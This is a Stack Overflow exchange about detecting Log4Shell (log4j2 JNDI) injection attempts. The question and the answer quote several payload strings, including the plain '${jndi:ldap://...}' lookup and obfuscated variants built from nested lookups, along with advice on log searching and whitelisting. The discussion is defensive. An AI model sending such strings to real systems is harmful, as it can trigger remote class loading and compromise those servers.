0

Recently log4j2 vulnerability has been widely spread, for the basic JNDI lookup can be as easy as


${jndi:ldap://127.0.0.1:3089/}

But this isn't a common way to doing it. I had seed some of the hacker trying to use pattern lookup as complex as


${${::-j}${::-n}${::-d}${::-i})

I would like to know where is this document based on? How can we know what other the pattern they can inject?

Basil Bourque
  • 303,325
  • 100
  • 852
  • 1,154
taymedee
  • 484
  • 2
  • 5
  • 11
  • 1
    Are you trying to blacklist some regex to sanitize your input? That is just a partial solution, you will never have any guarantee that you didn't miss a pattern. To make sure your input is safe you should instead whitelist what you accept, not blacklist what you reject. – wi2ard Dec 15 '21 at 09:10

1 Answers1

0

there might not be infinite combinations, but way to many ways to describe the JNDI LDAP protocol to describe all of them in one regular expression to detect them.

One more example: ${jndi:${lower:l}${lower:d}ap://badurl}

you will find way more in blogposts about the detection of an attack.

You should search your logs for the main simple patterns, to identify if you were attacked, but the absence of a detection is not a guarantee that you are not attacked. Like a test can only cover if the tested input works, but not validate if the function under test behaves correctly for every input.

Simulant
  • 19,190
  • 8
  • 63
  • 98